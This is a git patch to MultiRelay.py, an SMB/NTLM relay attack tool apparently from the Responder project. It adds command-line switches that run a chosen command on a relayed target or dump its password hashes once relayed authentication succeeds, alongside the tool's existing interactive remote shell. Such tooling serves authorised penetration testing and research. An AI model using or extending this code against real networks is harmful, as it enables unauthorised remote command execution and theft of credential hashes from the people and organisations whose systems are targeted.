From ab2d8907f033384e593a38073e50604a834f4bf3 Mon Sep 17 00:00:00 2001 From: lgandx Date: Fri, 18 Nov 2016 11:55:16 -0300 Subject: [PATCH] Added: Scripting support. -c and -d command line switch --- tools/MultiRelay.py | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/tools/MultiRelay.py b/tools/MultiRelay.py index c2ef09b..e166487 100755 --- a/tools/MultiRelay.py +++ b/tools/MultiRelay.py @@ -36,7 +36,7 @@ from SMBFinger.Finger import RunFinger sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))) from socket import * -__version__ = "1.1" +__version__ = "1.2" def UserCallBack(op, value, dmy, parser): args=[] @@ -50,7 +50,9 @@ def UserCallBack(op, value, dmy, parser): parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0]) parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort") -parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay") +parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay") +parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand") +parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump") options, args = parser.parse_args() @@ -65,6 +67,8 @@ if options.UserToRelay is None: if options.ExtraPort is None: options.ExtraPort = 0 +OneCommand = options.OneCommand +Dump = options.Dump ExtraPort = options.ExtraPort UserToRelay = options.UserToRelay Host = options.TARGET, 445 @@ -469,7 +473,6 @@ def RunShellCmd(data, s, clientIP, Host, Username, Domain): print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure") return False - return False # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. if data[8:10] == "\x75\xcc": @@ -487,8 +490,19 @@ def RunShellCmd(data, s, clientIP, Host, Username, Domain): s.send(buffer1) data = s.recv(2048) + ## Run one command. + if data[8:10] == "\x75\x00" and OneCommand != None or Dump: + print "[+] Authenticated." + if OneCommand != None: + print "[+] Running command: %s"%(OneCommand) + RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Host) + if Dump: + print "[+] Dumping hashes" + DumpHashes(data, s, Host) + os._exit(1) + ## Drop into the shell. - if data[8:10] == "\x75\x00": + if data[8:10] == "\x75\x00" and OneCommand == None: print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" ShowHelp() #Make sure we don't open 2 shell at the same time.. @@ -598,7 +612,7 @@ def main(): while True: time.sleep(1) - except KeyboardInterrupt: + except (KeyboardInterrupt, SystemExit): sys.exit("\rExiting...") if __name__ == '__main__':